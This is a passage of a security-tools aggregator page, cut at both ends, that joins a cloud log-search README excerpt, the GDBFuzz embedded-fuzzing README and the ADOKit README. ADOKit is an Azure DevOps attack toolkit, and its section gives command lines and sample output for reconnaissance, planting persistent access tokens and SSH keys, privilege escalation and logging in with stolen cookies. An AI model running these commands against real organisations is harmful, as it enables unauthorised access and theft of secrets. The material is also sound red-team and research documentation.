โ”‚ย ย  โ””โ”€โ”€ cloudtrail-logs-00000000-ffffff--
โ”‚ย ย  โ””โ”€โ”€ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โ”‚ย ย  โ””โ”€โ”€ GetFileDownloadUrls.*secrets_.json
โ””โ”€โ”€ AZURE
โ””โ”€โ”€ 2024-03-04 01:01 AM
โ””โ”€โ”€ logs
โ””โ”€โ”€ cloudgrappler
โ””โ”€โ”€ okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints

By: Zion3R


This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.


Folder structure

.
โ”œโ”€โ”€ benchmark # Scripts to build Google's fuzzer test suite and run experiments
โ”œโ”€โ”€ dependencies # Contains a Makefile to install dependencies for GDBFuzz
โ”œโ”€โ”€ evaluation # Raw exeriment data, presented in the paper
โ”œโ”€โ”€ example_firmware # Embedded example applications, used for the evaluation
โ”œโ”€โ”€ example_programs # Contains a compiled example program and configs to test GDBFuzz
โ”œโ”€โ”€ src # Contains the implementation of GDBFuzz
โ”œโ”€โ”€ Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
โ”œโ”€โ”€ LICENSE # License
โ”œโ”€โ”€ Makefile # Makefile for creating the docker image or install GDBFuzz locally
โ””โ”€โ”€ README.md # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pie OS 32-bit. Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>


# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True


# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =


# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False

[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242

[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra


[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable and susequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure

.
โ”œโ”€โ”€ corpus # A folder that contains the input corpus.
โ”œโ”€โ”€ crashes # A folder that contains crashing inputs - if any.
โ”œโ”€โ”€ cfg # The control flow graph as adjacency list.
โ”œโ”€โ”€ fuzzer_stats # Statistics of the fuzzing campaign.
โ”œโ”€โ”€ plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
โ”œโ”€โ”€ reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzOneInput entrypoint that is used by almost all fuzzers like AFL, AFL++, libFuzzer,.... In benchmark/benchSUTs/GDBFuzz_wrapper/common There is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This allows to simulate an embedded device that consumes data via a well defined input interface and therefore run GDBFuzz on any application. For convenience we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper as explained later.

NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers therefore. The wrapper just exists for evaluation purposes to enable running benchmarks and comparisons on a scale!

Install and run in a Docker container

The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.

make dockerimage

To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programsand output folder as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split in two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independend analysis and comparisons of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver link
  • Connect MCU board and PC via USB (on MCU board, connect to the USB connector that is labeled as 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf This .elf file is also later used in the user configuration for Ghidra.

Start a new terminal, and run the following to start the a GDB Server:

st-util

Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put Board into 'Arm DAPLink' Mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing e.g. with

gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add following line to the openocd config file for the J-Link debugger: jlink.cfg

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

or (more stable). Build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as non-root user with pyusb we add appropriate rules to udev. Paste following lines to /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay coverage against fuzzware result fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, the are stored in the crashes folder. During evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by counting a uint8_t index variable to an attacker controllable uint32_t variable within a for loop.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on an Raspberry Pi 4a (8Gb)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified, such that it runs on an 32-Bit OS

In file ./dependencies/ghidra/support/launch.sh:125 The JAVA_HOME variable must be hardcoded therefore e.g. to JAVA_HOME="/usr/lib/jvm/default-java"

  1. STLink must be at version >= 1.7 to work properly -> Build from sources

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB compliant debug probe
  2. The firmware file.
  3. A running GDBServer and suitable GDB application.
  4. An entry point, where fuzzing should start e.g. a parser function or an address
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point e.g. serial connection

All these properties need to be specified in the config file.

Run the full Benchmark (RQ4 - 8)

For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next adopt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your demands (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.

On the host:

Install

sudo apt-get install graphviz

Install a recent version of node, for example Option 2 from here. Use Option 2 and not option 1. This should install both node and npm. For reference, our version numbers are (but newer versions should work too):

โžœ node --version
v16.9.1
โžœ npm --version
7.21.1

Install web UI dependencies:

cd ./src/webui
npm install

Install mosquitto MQTT broker, e.g. see here

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz and use a user config file where enable_UI is set to True. You can use the Docker container and arduinojson SUT from above. But make sure to set 'enable_UI' to 'True'.

The nodes covered in 'blue' are covered. White nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph takes too much time if the control flow graph is large).



ADOKit - Azure DevOps Services Attack Toolkit

By: Zion3R


Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Installation/Building

Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Fody https://github.com/Fody/Fody MIT License
Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

Pre-Compiled

  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.

Arguments/Options

  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

Examples

Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

Syntax

Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/28/2023 3:33:01 PM
==================================================


[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check

Whoami

Use Case

Get the current user and the user's group memberhips

Syntax

Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 11:33:12 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com


[*] INFO: Listing group memberships for the current user


Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in Azure DevOps instance

Syntax

Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 8:41:50 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in Azure DevOps instance

Syntax

Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 9:26:57 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in Azure DevOps instance

Syntax

Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:44:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in Azure DevOps instance

Syntax

Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:45:30 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in Azure DevOps instance

Syntax

Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 3:22:21 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchco de

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in Azure DevOps

Syntax

Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 11:28:34 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
----------------------------------------------------------------------------------------------------
